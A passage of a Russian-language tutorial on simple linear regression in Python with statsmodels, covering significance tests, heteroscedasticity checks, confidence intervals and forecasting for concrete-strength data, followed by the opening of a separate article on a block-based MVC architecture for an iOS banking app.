print('R2_adj =', result_linear_ols.rsquared_adj)
```
Значимость коэффициента детерминации можно проверить по критерию Фишера [3, с.201-203; 8, с.83].
Расчетное значение статистики критерия Фишера может быть получено с помощью свойства **fvalue** модели:
```
print(f"result_linear_ols.fvalue = {result_linear_ols.fvalue}")
```
Расчетный уровень значимости при проверке гипотезы по критерию Фишера может быть получено с помощью свойства **f\_pvalue** модели:
```
print(f"result_linear_ols.f_pvalue = {result_linear_ols.f_pvalue}")
```
Можно рассчитать уровень значимости самостоятельно (так сказать, для лучшего понимания и общей демонстрации возможностей) - для этого воспользуемся библиотекой **scipy**, модулем распределения Фишера **scipy.stats.f**, свойством **cdf** (функция распределения):
```
df1 = int(result_linear_ols.df_model)
df2 = int(result_linear_ols.nobs - result_linear_ols.df_model - 1)
F_calc = result_linear_ols.fvalue
a_calc = 1 - sci.stats.f.cdf(F_calc, df1, df2, loc=0, scale=1)
print(a_calc)
```
Как видим, результаты совпадают.
Табличное значение статистики критерия Фишера получить с помощью **Regression Results** нельзя. Рассчитаем его самостоятельно - для этого воспользуемся библиотекой **scipy**, модулем распределения Стьюдента **scipy.stats.f**, свойством **ppf** (процентные точки):
```
F_table = sci.stats.f.ppf(p_level, df1, df2, loc=0, scale=1)
print(F_table)
```
Для удобства создадим пользовательскую функцию **determination\_coef\_check** для проверки значимости коэффициента детерминации, которая объединяет все вышеперечисленные расчеты:
```
# Пользовательская функция
def determination_coef_check(
model_fit,
p_level: float=0.95):
a_level = 1 - p_level
R2 = model_fit.rsquared
R2_adj = model_fit.rsquared_adj
n = model_fit.nobs # объем выборки
p = model_fit.df_model # Model degrees of freedom. The number of regressors p. Does not include the constant if one is present.
F_calc = R2 / (1 - R2) * (n-p-1)/p
df1 = int(p)
df2 = int(n-p-1)
F_table = sci.stats.f.ppf(p_level, df1, df2, loc=0, scale=1)
a_calc = 1 - sci.stats.f.cdf(F_calc, df1, df2, loc=0, scale=1)
conclusion_determ_coef_sign = 'significance' if F_calc >= F_table else 'not significance'
# формируем результат
result = pd.DataFrame({
'notation': ('R2'),
'coef_value (R)': (sqrt(R2)),
'coef_value_squared (R2)': (R2),
'p_level': (p_level),
'a_level': (a_level),
'F_calc': (F_calc),
'df1': (df1),
'df2': (df2),
'F_table': (F_table),
'F_calc >= F_table': (F_calc >= F_table),
'a_calc': (a_calc),
'a_calc <= a_level': (a_calc <= a_level),
'significance_check': (conclusion_determ_coef_sign),
'conf_int_low': (''),
'conf_int_high': ('')
},
index=['Coef. of determination'])
return result
determination_coef_check(
result_linear_ols,
p_level=0.95)
```
**Вывод:** коэффициент детерминации ЗНАЧИМ.
**6. Коэффициенты регрессии и проверка их значимости**
Ранее мы уже извлекли коэффициенты регрессии как параметры модели **b0** и **b1** (как свойство **params** модели). Также можно получить их значения, как свойство **bse** модели:
```
print(b0, b1)
print(result_linear_ols.bse, type(result_linear_ols.bse))
```
Значимость коэффициентов регрессии можно проверить по критерию Стьюдента [3, с.203-212; 8, с.78].
Расчетные значения статистики критерия Стьюдента могут быть получены с помощью свойства **tvalues** модели:
```
print(f"result_linear_ols.tvalues = \n{result_linear_ols.tvalues}")
```
Расчетные значения уровня значимости при проверке гипотезы по критерию Стьюдента могут быть получены с помощью свойства **pvalues** модели:
```
print(f"result_linear_ols.pvalues = \n{result_linear_ols.pvalues}")
```
Доверительные интервалы для коэффициентов регрессии могут быть получены с помощью свойства **conf\_int** модели:
```
print(result_linear_ols.conf_int(), '\n')
```
Можно рассчитать уровень значимости самостоятельно (как ранее для критерия Фишера - для лучшего понимания и общей демонстрации возможностей) - для этого воспользуемся библиотекой **scipy**, модулем распределения Стьюдента **scipy.stats.t**, свойством **cdf** (функция распределения):
```
t_calc = result_linear_ols.tvalues
df = int(result_linear_ols.nobs - result_linear_ols.df_model - 1)
a_calc = 2*(1-sci.stats.t.cdf(abs(t_calc), df, loc=0, scale=1))
print(a_calc)
```
Как видим, результаты совпадают.
Табличные значения статистики критерия Стьюдента получить с помощью **Regression Results** нельзя. Рассчитаем их самостоятельно - для этого воспользуемся библиотекой **scipy**, модулем распределения Стьюдента **scipy.stats.t**, свойством **ppf** (процентные точки):
```
t_table = sci.stats.t.ppf((1 + p_level)/2 , df)
print(t_table)
```
Для удобства создадим пользовательскую функцию **regression\_coef\_check** для проверки значимости коэффициентов регрессии, которая объединяет все вышеперечисленные расчеты:
```
def regression_coef_check(
model_fit,
notation_coef: list='',
p_level: float=0.95):
a_level = 1 - p_level
# параметры модели (коэффициенты регрессии)
model_params = model_fit.params
# стандартные ошибки коэффициентов регрессии
model_bse = model_fit.bse
# проверка гипотезы о значимости регрессии
t_calc = abs(model_params) / model_bse
n = model_fit.nobs # объем выборки
p = model_fit.df_model # Model degrees of freedom. The number of regressors p. Does not include the constant if one is present.
df = int(n - p - 1)
t_table = sci.stats.t.ppf((1 + p_level)/2 , df)
a_calc = 2*(1-sci.stats.t.cdf(t_calc, df, loc=0, scale=1))
conclusion_ = ['significance' if elem else 'not significance' for elem in (t_calc >= t_table).values]
# доверительный интервал коэффициента регрессии
conf_int_low = model_params - t_table*model_bse
conf_int_high = model_params + t_table*model_bse
# формируем результат
result = pd.DataFrame({
'notation': (notation_coef),
'coef_value': (model_params),
'std_err': (model_bse),
'p_level': (p_level),
'a_level': (a_level),
't_calc': (t_calc),
'df': (df),
't_table': (t_table),
't_calc >= t_table': (t_calc >= t_table),
'a_calc': (a_calc),
'a_calc <= a_level': (a_calc <= a_level),
'significance_check': (conclusion_),
'conf_int_low': (conf_int_low),
'conf_int_high': (conf_int_high),
})
return result
regression_coef_check(
result_linear_ols,
notation_coef=['b0', 'b1'],
p_level=0.95)
```
**Вывод:** коэффициенты регрессии **b0** и **b1** ЗНАЧИМЫ.
**7. Проверка гетероскедастичности**
Для проверка гетероскедастичности **statsmodels** предлагает нам следующие инструменты:
* тест Голдфелда-Квандта (<https://www.statsmodels.org/stable/generated/statsmodels.stats.diagnostic.het_goldfeldquandt.html#statsmodels.stats.diagnostic.het_goldfeldquandt>) - теорию см. [8, с.178], также [https://ru.wikipedia.org/wiki/Тест\_Голдфелда\_—\_Куандта](https://ru.wikipedia.org/wiki/%D0%A2%D0%B5%D1%81%D1%82_%D0%93%D0%BE%D0%BB%D0%B4%D1%84%D0%B5%D0%BB%D0%B4%D0%B0_%E2%80%94_%D0%9A%D1%83%D0%B0%D0%BD%D0%B4%D1%82%D0%B0).
* тест Бриша-Пэгана (Breush-Pagan test) (<https://www.statsmodels.org/stable/generated/statsmodels.stats.diagnostic.het_breuschpagan.html#statsmodels.stats.diagnostic.het_breuschpagan>) - теорию см.[8, с.179], также [https://en.wikipedia.org/wiki/Breusch–Pagan\_test](https://en.wikipedia.org/wiki/Breusch%E2%80%93Pagan_test).
* тест Уайта (White test) (<https://www.statsmodels.org/stable/generated/statsmodels.stats.diagnostic.het_white.html#statsmodels.stats.diagnostic.het_white>) - теорию см.[8, с.177], а также [https://ru.wikipedia.org/wiki/Тест\_Уайта](https://ru.wikipedia.org/wiki/%D0%A2%D0%B5%D1%81%D1%82_%D0%A3%D0%B0%D0%B9%D1%82%D0%B0).
**Тест Голдфелда-Квандта (Goldfeld–Quandt test)**
```
# тест Голдфелда-Квандта (Goldfeld–Quandt test)
test = sms.het_goldfeldquandt(result_linear_ols.resid, result_linear_ols.model.exog)
test_result = lzip(['F_calc', 'p_calc'], test) # распаковка результатов теста
# расчетное значение статистики F-критерия
F_calc_tuple = test_result[0]
F_calc = F_calc_tuple[1]
print(f"Расчетное значение статистики F-критерия: F_calc = {round(F_calc, DecPlace)}")
# расчетный уровень значимости
p_calc_tuple = test_result[1]
p_calc = p_calc_tuple[1]
print(f"Расчетное значение доверительной вероятности: p_calc = {round(p_calc, DecPlace)}")
#a_calc = 1 - p_value
#print(f"Расчетное значение уровня значимости: a_calc = 1 - p_value = {round(a_calc, DecPlace)}")
# вывод
if p_calc < a_level:
conclusion_GQ_test = f"Так как p_calc = {round(p_calc, DecPlace)} < a_level = {round(a_level, DecPlace)}" + \
", то дисперсии в подвыборках отличаются значимо, т.е. гипотеза о наличии гетероскедастичности ПРИНИМАЕТСЯ"
else:
conclusion_GQ_test = f"Так как p_calc = {round(p_calc, DecPlace)} >= a_level = {round(a_level, DecPlace)}" + \
", то дисперсии в подвыборках отличаются незначимо, т.е. гипотеза о наличии гетероскедастичности ОТВЕРГАЕТСЯ"
print(conclusion_GQ_test)
```
Для удобства создадим пользовательскую функцию **Goldfeld\_Quandt\_test**:
```
def Goldfeld_Quandt_test(
model_fit,
p_level: float=0.95,
model_name=''):
a_level = 1 - p_level
# реализация теста
test = sms.het_goldfeldquandt(model_fit.resid, model_fit.model.exog)
test_result = lzip(['F_statistic', 'p_calc'], test) # распаковка результатов теста
# расчетное значение статистики F-критерия
F_calc_tuple = test_result[0]
F_statistic = F_calc_tuple[1]
# расчетный уровень значимости
p_calc_tuple = test_result[1]
p_calc = p_calc_tuple[1]
# вывод
conclusion_test = 'heteroscedasticity' if p_calc < a_level else 'not heteroscedasticity'
result = pd.DataFrame({
'test': ('Goldfeld–Quandt test'),
'p_level': (p_level),
'a_level': (a_level),
'F_statistic': (F_statistic),
'p_calc': (p_calc),
'p_calc < a_level': (p_calc < a_level),
'heteroscedasticity_check': (conclusion_test)
},
index=[model_name])
return result
Goldfeld_Quandt_test(result_linear_ols, p_level=0.95, model_name='linear_ols')
```
**Тест Бриша-Пэгана (Breush-Pagan test)**
```
# тест Бриша-Пэгана (Breush-Pagan test)
name = ["Lagrange multiplier statistic", "p-value", "f-value", "f p-value"]
test = sms.het_breuschpagan(result_linear_ols.resid, result_linear_ols.model.exog)
lzip(name, test)
```
Для удобства создадим пользовательскую функцию **Breush\_Pagan\_test**:
```
def Breush_Pagan_test(
model_fit,
p_level: float=0.95,
model_name=''):
a_level = 1 - p_level
# реализация теста
test = sms.het_breuschpagan(model_fit.resid, model_fit.model.exog)
name = ['Lagrange_multiplier_statistic', 'p_calc_LM', 'F_statistic', 'p_calc']
test_result = lzip(name, test) # распаковка результатов теста
# расчетное значение статистики теста множителей Лагранжа
LM_calc_tuple = test_result[0]
Lagrange_multiplier_statistic = LM_calc_tuple[1]
# расчетный уровень значимости статистики теста множителей Лагранжа
p_calc_LM_tuple = test_result[1]
p_calc_LM = p_calc_LM_tuple[1]
# расчетное значение F-статистики гипотезы о том, что дисперсия ошибки не зависит от x
F_calc_tuple = test_result[2]
F_statistic = F_calc_tuple[1]
# расчетный уровень значимости F-статистики
p_calc_tuple = test_result[3]
p_calc = p_calc_tuple[1]
# вывод
conclusion_test = 'heteroscedasticity' if p_calc < a_level else 'not heteroscedasticity'
# вывод
conclusion_test = 'heteroscedasticity' if p_calc < a_level else 'not heteroscedasticity'
result = pd.DataFrame({
'test': ('Breush-Pagan test'),
'p_level': (p_level),
'a_level': (a_level),
'Lagrange_multiplier_statistic': (Lagrange_multiplier_statistic),
'p_calc_LM': (p_calc_LM),
'p_calc_LM < a_level': (p_calc_LM < a_level),
'F_statistic': (F_statistic),
'p_calc': (p_calc),
'p_calc < a_level': (p_calc < a_level),
'heteroscedasticity_check': (conclusion_test)
},
index=[model_name])
return result
Breush_Pagan_test(result_linear_ols, p_level=0.95, model_name='linear_ols')
```
**Тест Уайта (White test)**
```
# тест Уайта (White test)
name = ["Lagrange multiplier statistic", "p-value", "f-value", "f p-value"]
test = sms.het_white(result_linear_ols.resid, result_linear_ols.model.exog)
lzip(name, test)
```
Для удобства создадим пользовательскую функцию **White\_test**:
```
def White_test(
model_fit,
p_level: float=0.95,
model_name=''):
a_level = 1 - p_level
# реализация теста
test = sms.het_white(model_fit.resid, model_fit.model.exog)
name = ['Lagrange_multiplier_statistic', 'p_calc_LM', 'F_statistic', 'p_calc']
test_result = lzip(name, test) # распаковка результатов теста
# расчетное значение статистики теста множителей Лагранжа
LM_calc_tuple = test_result[0]
Lagrange_multiplier_statistic = LM_calc_tuple[1]
# расчетный уровень значимости статистики теста множителей Лагранжа
p_calc_LM_tuple = test_result[1]
p_calc_LM = p_calc_LM_tuple[1]
# расчетное значение F-статистики гипотезы о том, что дисперсия ошибки не зависит от x
F_calc_tuple = test_result[2]
F_statistic = F_calc_tuple[1]
# расчетный уровень значимости F-статистики
p_calc_tuple = test_result[3]
p_calc = p_calc_tuple[1]
# вывод
conclusion_test = 'heteroscedasticity' if p_calc < a_level else 'not heteroscedasticity'
# вывод
conclusion_test = 'heteroscedasticity' if p_calc < a_level else 'not heteroscedasticity'
result = pd.DataFrame({
'test': ('White test'),
'p_level': (p_level),
'a_level': (a_level),
'Lagrange_multiplier_statistic': (Lagrange_multiplier_statistic),
'p_calc_LM': (p_calc_LM),
'p_calc_LM < a_level': (p_calc_LM < a_level),
'F_statistic': (F_statistic),
'p_calc': (p_calc),
'p_calc < a_level': (p_calc < a_level),
'heteroscedasticity_check': (conclusion_test)
},
index=[model_name])
return result
White_test(result_linear_ols, p_level=0.95, model_name='linear_ols')
```
Объединим результаты всех тестов гетероскедастичность в один DataFrame:
```
Goldfeld_Quandt_test_df = Goldfeld_Quandt_test(result_linear_ols, p_level=0.95, model_name='linear_ols')
Breush_Pagan_test_df = Breush_Pagan_test(result_linear_ols, p_level=0.95, model_name='linear_ols')
White_test_df = White_test(result_linear_ols, p_level=0.95, model_name='linear_ols')
heteroscedasticity_tests_df = pd.concat([Breush_Pagan_test_df, White_test_df, Goldfeld_Quandt_test_df])
display(heteroscedasticity_tests_df)
```
**Выводы**
Итак, мы провели статистический анализ регрессионной модели и установили:
* исходные данные имеют нормальное распределение;
* между переменными имеется весьма сильная корреляционная связь;
* регрессионная модель хорошо аппроксимирует фактические данные;
* остатки модели имеют нормальное распределение;
* регрессионная модель адекватна по критерию Фишера;
* коэффициент детерминации значим по критеию Фишера;
* коэффициенты регрессии значимы по критерию Стьюдента;
* гетероскедастичность отсутствует.
Применительно к рассматриваемой задаче выполнять проверку автокорреляции не имеет особого смысла из-за особенностей исходных данных (результаты замеров прочности бетона на разных участках здания).
Про статистический анализ регрессионных моделей с помощью **statsmodels**- см. еще <https://www.statsmodels.org/stable/examples/notebooks/generated/regression_diagnostics.html>.
### Доверительные интервалы регрессионной модели
Для регрессионных моделей определяют доверительные интервалы двух видов [3, с.184-192; 4, с.172; 8, с.205-209]:
1. Доверительный интервал средних значений переменной **Y**.
2. Доверительный интервал индивидуальных значений переменной **Y**.
При этом размер доверительного интервала для индивидуальных значений больше, чем для средних значений.
Доверительные интервалы регрессионных моделей (ДИРМ) могут быть найдены разными способами:
* непосредственно путем расчетов по формулам (см., например, <https://habr.com/ru/post/558158/>);
* с использованием инструментария библиотеки **statsmodels** (см., например, <https://www.stackfinder.ru/questions/17559408/confidence-and-prediction-intervals-with-statsmodels>).
Разбререм более подробно способ с использованием библиотеки **statsmodels**. Прежде всего, с помощью свойства **summary\_table** класса **statsmodels.stats.outliers\_influence.OLSInfluence** (<https://www.statsmodels.org/stable/generated/statsmodels.stats.outliers_influence.OLSInfluence.html?highlight=olsinfluence>) мы можем получить таблицу данных, содержащую необходимую нам информацию:
* **Dep Var Population** - фактические значения переменной **Y**;
* **Predicted Value** - предсказанные значения переменной **Y** по по регрессионной модели;
* **Std Error Mean Predict** - среднеквадратическая ошибка предсказанного среднего;
* **Mean ci 95% low** и **Mean ci 95% upp** - границы доверительного интервала средних значений переменной **Y**;
* **Predict ci 95% low** и **Predict ci 95% upp** - границы доверительного интервала индивидуальных значений переменной **Y**;
* **Residual** - остатки регрессионной модели;
* **Std Error Residual** - среднеквадратическая ошибка остатков;
* **Student Residual** - стьюдентизированные остатки (подробнее см. <http://statistica.ru/glossary/general/studentizirovannie-ostatki/>);
* **Cook's D** - Расстояние Кука (Cook's distance) - оценивает эффект от удаления одного (рассматриваемого) наблюдения; наблюдение считается выбросом, если Di > 4/n (более подробно - см.[https://translated.turbopages.org/proxy\_u/en-ru.ru.f584ceb5-63296427-aded8f31-74722d776562/https/en.wikipedia.org/wiki/Cook's\_distance](https://translated.turbopages.org/proxy_u/en-ru.ru.f584ceb5-63296427-aded8f31-74722d776562/https/en.wikipedia.org/wiki/Cook%27s_distance), [http://www.machinelearning.ru/wiki/index.php?title=Расстояние\_Кука](http://www.machinelearning.ru/wiki/index.php?title=%D0%A0%D0%B0%D1%81%D1%81%D1%82%D0%BE%D1%8F%D0%BD%D0%B8%D0%B5_%D0%9A%D1%83%D0%BA%D0%B0)).
```
from statsmodels.stats.outliers_influence import summary_table
st, data, ss2 = summary_table(result_linear_ols, alpha=0.05)
print(st, '\n', type(st))
```
В нашем случае критическое значение расстояния Кука равно:
```
print(f'D_crit = 4/n = {4/result_linear_ols.nobs}')
```
то есть выбросов, смещающих оценки коэффициентов регрессии, не наблюдается.
Мы получили данные как класс **statsmodels.iolib.table.SimpleTable**. Свойство **data** преобразует данные в список. Далее для удобства работы преобразуем данные в DataFrame:
```
st_data_df = pd.DataFrame(st.data)
```
Будем использовать данный DataFrame в дальнейшем, несколько преобразуем его:
* изменим наименование столбцов (с цифр на названия показателей из таблицы **summary\_table**)
* удалим строки с текстовыми значениями
* изменим индекс
* добавим новый столбец - значения переменной **X**
* отсортируем по возрастанию значений переменной **X** (это необходимо, чтобы графики границ доверительных интервалов выглядели как линии)
```
st_df = st_data_df.copy()
# изменим наименования столбцов
str = st_df.iloc[0,0:] + ' ' + st_df.iloc[1,0:]
st_df = st_df.rename(str, axis='columns')
# удалим строки 0, 1
st_df = st_df.drop([0,1])
# изменим индекс
st_df = st_df.set_index(np.arange(0, result_linear_ols.nobs))
# добавим новый столбец - значения переменной X
st_df.insert(1, 'X', X)
# отсортируем по возрастанию значений переменной X
st_df = st_df.sort_values(by='X')
display(st_df)
```
С помощью полученных данных мы можем построить график регрессионной модели с доверительными интервалами:
```
# создание рисунка (Figure) и области рисования (Axes)
fig, axes = plt.subplots(figsize=(297/INCH, 210/INCH))
# заголовок рисунка (Figure)
title_figure = Task_Project
fig.suptitle(title_figure, fontsize = 16)
# заголовок области рисования (Axes)
title_axes = 'Линейная регрессионная модель'
axes.set_title(title_axes, fontsize = 14)
# фактические данные
sns.scatterplot(
x=st_df['X'], y=st_df['Dep Var Population'],
label='фактические данные',
s=50,
color='red',
ax=axes)
# график регрессионной модели
label_legend_regr_model=f'линейная регрессия Y = {b0:.3f} + {b1:.4f}*X'
sns.lineplot(
x=st_df['X'], y=st_df['Predicted Value'],
label=label_legend_regr_model,
color='blue',
ax=axes)
# доверительный интервал средних значений переменной Y
Mean_ci_low = st_df['Mean ci 95% low']
plt.plot(
st_df['X'], Mean_ci_low,
color='magenta', linestyle='--', linewidth=1,
label='доверительный интервал средних значений Y')
Mean_ci_upp = st_df['Mean ci 95% upp']
plt.plot(
st_df['X'], Mean_ci_upp,
color='magenta', linestyle='--', linewidth=1)
# доверительный интервал индивидуальных значений переменной Y
Predict_ci_low = st_df['Predict ci 95% low']
plt.plot(
st_df['X'], Predict_ci_low,
color='orange', linestyle='-.', linewidth=2,
label='доверительный интервал индивидуальных значений Y')
Predict_ci_upp = st_df['Predict ci 95% upp']
plt.plot(
st_df['X'], Predict_ci_upp,
color='orange', linestyle='-.', linewidth=2)
axes.set_xlabel(Variable_Name_X)
axes.set_ylabel(Variable_Name_Y)
axes.legend(prop={'size': 12})
plt.show()
```
Однако, мы получили данные о границах доверительных интервалов регрессионной модели только в пределах области фактических значений переменной **X**. Как быть, если мы хотим распространить прогноз за пределы этой области?
### Прогнозирование
Под прогнозированием мы в данном случае будем понимать определение значений переменной **Y** и доверительных интервалов для ее средних и индивидуальных значений при заданном **X**. По сути, нам предстоит построить аналог рассмотренной выше таблицы **summary\_table**, только с другими значениями **X**, причем эти значения могут выходить за пределы тех значений, которые использовались нами для построения регрессии.
Методика расчета доверительных интервалов регрессионных моделей разобрана в статье **"Python, корреляция и регрессия: часть 4"** (<https://habr.com/ru/post/558158/>), всем рекомендую ознакомиться.
Найти прогнозные значения **Y** не представляет труда, так как ранее мы уже формализовали модель в виде лямбда-функции, а вот для построения доверительных интервалов придется выполнить расчеты по формулам. Для этого создадим пользовательскую функцию **regression\_pair\_predict**, которая в случае парной регрессии (**pair regression**) для заданного значения **X** возвращает:
* прогнозируемое по регрессионной модели значение **y\_calc**
* доверительный интервал **[y\_calc\_mean\_ci\_low, y\_calc\_mean\_ci\_upp]** средних значений переменной **Y**
* доверительный интервал **[y\_calc\_predict\_ci\_low, y\_calc\_predict\_ci\_upp]** индивидуальных значений переменной **Y**
Алгоритм расчета доверительных интервалов для множественной регрессии (**multiple regression**) отличается и в данном обзоре не рассматривается (рассмотрим в дальнейшем).
Про прогнозирование с помощью регрессионных моделей - см.также:
* <https://www.statsmodels.org/stable/generated/statsmodels.regression.linear_model.RegressionResults.predict.html?highlight=predict#statsmodels.regression.linear_model.RegressionResults.predict>
* <https://www.statology.org/statsmodels-predict/>
* <https://www.statsmodels.org/stable/examples/notebooks/generated/predict.html>
```
def regression_pair_predict(
x_in,
model_fit,
regression_model,
p_level: float=0.95):
a_level = 1 - p_level
X = pd.DataFrame(model_fit.model.exog)[1].values # найти лучшее решение
Y = model_fit.model.endog
# вспомогательные величины
n = int(result_linear_ols.nobs)
SSE = model_fit.ssr # SSE (Sum of Squared Error)
dfE = n - p - 1
MSE = SSE / dfE # остаточная дисперсия
Xmean = np.mean(X)
SST_X = np.sum([(X[i] - Xmean)**2 for i in range(0, n)])
t_table = sci.stats.t.ppf((1 + p_level)/2 , dfE)
S2_y_calc_mean = MSE * (1/n + (x_in - Xmean)**2 / SST_X)
S2_y_calc_predict = MSE * (1 + 1/n + (x_in - Xmean)**2 / SST_X)
# прогнозируемое значение переменной Y
y_calc=regression_model(x_in)
# доверительный интервал средних значений переменной Y
y_calc_mean_ci_low = y_calc - t_table*sqrt(S2_y_calc_mean)
y_calc_mean_ci_upp = y_calc + t_table*sqrt(S2_y_calc_mean)
# доверительный интервал индивидуальных значений переменной Y
y_calc_predict_ci_low = y_calc - t_table*sqrt(S2_y_calc_predict)
y_calc_predict_ci_upp = y_calc + t_table*sqrt(S2_y_calc_predict)
result = y_calc, y_calc_mean_ci_low, y_calc_mean_ci_upp, y_calc_predict_ci_low, y_calc_predict_ci_upp
return result
```
Сравним результаты расчета доверительных интервалов разными способами - с использованием функции **regression\_pair\_predict** и средствами **statsmodels**, для этого сформируем DaraFrame с новыми данными:
```
regression_pair_predict_df = pd.DataFrame(
[regression_pair_predict(elem, result_linear_ols, regression_model=Y_calc) for elem in st_df['X'].values],
columns=['y_calc', 'y_calc_mean_ci_low', 'y_calc_mean_ci_upp', 'y_calc_predict_ci_low', 'y_calc_predict_ci_upp'])
regression_pair_predict_df.insert(0, 'X', st_df['X'].values)
display(regression_pair_predict_df)
```
Видим, что результаты расчетов идентичны, следовательно мы можем использовать функцию **regression\_pair\_predict** для прогнозирования.
```
def graph_regression_pair_predict_plot_sns(
model_fit,
regression_model_in,
Xmin=None, Xmax=None, Nx=10,
Ymin_graph=None, Ymax_graph=None,
title_figure=None, title_figure_fontsize=18,
title_axes=None, title_axes_fontsize=16,
x_label=None,
y_label=None,
label_fontsize=14, tick_fontsize=12,
label_legend_regr_model='', label_legend_fontsize=12,
s=50, linewidth_regr_model=2,
graph_size=(297/INCH, 210/INCH),
result_output=True,
file_name=None):
# фактические данные
X = pd.DataFrame(model_fit.model.exog)[1].values # найти лучшее решение
Y = model_fit.model.endog
X = np.array(X)
Y = np.array(Y)
# границы
if not(Xmin) and not(Xmax):
Xmin=min(X)
Xmax=max(X)
Xmin_graph=min(X)*0.99
Xmax_graph=max(X)*1.01
else:
Xmin_graph=Xmin
Xmax_graph=Xmax
if not(Ymin_graph) and not(Ymax_graph):
Ymin_graph=min(Y)*0.99
Ymax_graph=max(Y)*1.01
# формируем DataFrame данных
Xcalc = np.linspace(Xmin, Xmax, num=Nx)
Ycalc = regression_model_in(Xcalc)
result_df = pd.DataFrame(
[regression_pair_predict(elem, model_fit, regression_model=regression_model_in) for elem in Xcalc],
columns=['y_calc', 'y_calc_mean_ci_low', 'y_calc_mean_ci_upp', 'y_calc_predict_ci_low', 'y_calc_predict_ci_upp'])
result_df.insert(0, 'x_calc', Xcalc)
# заголовки графика
fig, axes = plt.subplots(figsize=graph_size)
fig.suptitle(title_figure, fontsize = title_figure_fontsize)
axes.set_title(title_axes, fontsize = title_axes_fontsize)
# фактические данные
sns.scatterplot(
x=X, y=Y,
label='фактические данные',
s=s,
color='red',
ax=axes)
# график регрессионной модели
sns.lineplot(
x=Xcalc, y=Ycalc,
color='blue',
linewidth=linewidth_regr_model,
legend=True,
label=label_legend_regr_model,
ax=axes)
# доверительный интервал средних значений переменной Y
Mean_ci_low = result_df['y_calc_mean_ci_low']
plt.plot(
result_df['x_calc'], Mean_ci_low,
color='magenta', linestyle='--', linewidth=1,
label='доверительный интервал средних значений Y')
Mean_ci_upp = result_df['y_calc_mean_ci_upp']
plt.plot(
result_df['x_calc'], Mean_ci_upp,
color='magenta', linestyle='--', linewidth=1)
# доверительный интервал индивидуальных значений переменной Y
Predict_ci_low = result_df['y_calc_predict_ci_low']
plt.plot(
result_df['x_calc'], Predict_ci_low,
color='orange', linestyle='-.', linewidth=2,
label='доверительный интервал индивидуальных значений Y')
Predict_ci_upp = result_df['y_calc_predict_ci_upp']
plt.plot(
result_df['x_calc'], Predict_ci_upp,
color='orange', linestyle='-.', linewidth=2)
axes.set_xlim(Xmin_graph, Xmax_graph)
axes.set_ylim(Ymin_graph, Ymax_graph)
axes.set_xlabel(x_label, fontsize = label_fontsize)
axes.set_ylabel(y_label, fontsize = label_fontsize)
axes.tick_params(labelsize = tick_fontsize)
#axes.tick_params(labelsize = tick_fontsize)
axes.legend(prop={'size': label_legend_fontsize})
plt.show()
if file_name:
fig.savefig(file_name, orientation = "portrait", dpi = 300)
if result_output:
return result_df
else:
return
graph_regression_pair_predict_plot_sns(
model_fit=result_linear_ols,
regression_model_in=Y_calc,
Xmin=Xmin_graph-300, Xmax=Xmax_graph+200, Nx=25,
Ymin_graph=Ymin_graph-5, Ymax_graph=Ymax_graph+5,
title_figure=Task_Project, title_figure_fontsize=16,
title_axes='Линейная регрессионная модель', title_axes_fontsize=14,
x_label=Variable_Name_X,
y_label=Variable_Name_Y,
label_legend_regr_model=f'линейная регрессия Y = {b0:.3f} + {b1:.4f}*X',
s=50,
result_output=True,
file_name='graph/regression_plot_lin.png')
```
### Выводы и рекомендации
Исследована зависимость показаний ультразвукового прибора "ПУЛЬСАР-2.1" (**X**) и результатов замера прочности бетона (методом отрыва со скалыванием) склерометром ИПС-МГ4.03 (**Y**).
Между переменными имеется весьма сильная линейная корреляционная связь. Получена регрессионная модель:
**Y = b0 + b1∙X = -21.3741 + 0.0129∙X**
Модель хорошо аппроксимирует фактические данные, является адекватной, значимой и может использоваться для предсказания прочности бетона.
Также построен график прогноза с доверительными интервалами.
ИТОГИ
-----
Итак, мы рассмотрели все этапы регрессионного анализа в случае **простой линейной регрессии (simple linear regression)** с использованием библиотеки **statsmodels** на конкретном практическом примере; подробно остановились на статистическом анализа модели с проверкой гипотез; также предложен ряд пользовательских функций, облегчающих работу исследователя и уменьшающих размер программного кода.
Конечно, мы разобрали далеко не все вопросы анализа регрессионных моделей и возможности библиотеки **statsmodels** применительно к **simple linear regression**, в частности статистики влияния (**Influence Statistics**), инструмент **Leverage**, анализ стьюдентизированных остатков и пр. - это темы для отдельных обзоров.
Исходный код находится в моем [репозитории на GitHub](https://github.com/AANazarov/Statistical-methods).
Надеюсь, данный обзор поможет специалистам **DataScience** в работе. | https://habr.com/ru/post/690414/ | null | ru | null |
# Мобильный банк для iOS: добавляем блочную архитектуру к Cocoa MVC
Если вы пишете приложение мобильного банка для iOS, какие у вас приоритеты? Думаю, их два:
1. Надёжность;
2. Скорость внесения изменений.
Ситуация такова, что нужно уметь вносить изменения (и в частности выкатывать новые банковские продукты) *действительно* быстро. Но при этом не скатываться в индусокод и копипаст (см. пункт 1). Всё это при том, что приложение действительно огромное по функционалу, по крайней мере в задумке (банки хотят намного больше, чем умеют). Соответственно, во многих случаях это проекты на десятки человеко-лет. Те, кто участвовал в таких проектах, уже наверно поняли, что задача нетривиальная, и [школьные знания](https://itunes.apple.com/us/course/developing-ios-9-apps-swift/id1104579961) тут не помогут.
#### Что же делать?
Сразу понятно, что это задача по архитектуре. Прежде чем писать код, я увидел простую и красивую блочную архитектуру фронтенда нашей ДБО. Не видел раньше подобного в мобильных приложениях, но в итоге сделал аналогичное решение, вполне эффективное и масштабируемое, в рамках iOS SDK, без добавления массивных фреймворков. Хочу поделиться основными моментами.
Да, про все эти рамки SDK, про эппловские ~~косяки~~ особенности паттерна MVC и про быдлокод в официальной документации знают все, кто пытался писать и поддерживать серьёзные приложения (или хотя бы читал [Хабр](https://habrahabr.ru/post/202960/)) — не буду повторяться. Здесь также не будет основ программирования, файлов с примерами и фотографий с котиками.

*Первая гуглокартинка по запросу «advanced architecture»*
Суть решения
------------
**Операции состоят из атомов.**
Операция — это интерфейс для совершения конкретного действия в АБС. Например, перевод между своими счетами.
Атом — это стабильная «капсула» из MVC, некий кирпичик, из которого можно строить дома любого размера и формы. Каждый кирпичик имеет свою сущность в UI: надпись, поле для ввода, картинка. Каждый значимый UI-блок инкапсулируется в такой MVC-кирпичик. Например, `UISegmentedControl` инкапсулируется в `SegmentedAtom`.
Эти MVC-кирпичики пишутся один раз. Дальше каждая операция строится из этих кирпичиков. Положить кирпичик — это одна строчка. Одна строчка! Дальше получить значение — это опять одна строчка. Всё остальное решается наследованием и полиморфизмом в подклассах Atom. Задача — максимально упростить код самих операций, т.к. именно они могут сильно меняться. Кирпичики принципиально не меняются (или даже *вообще* не меняются).
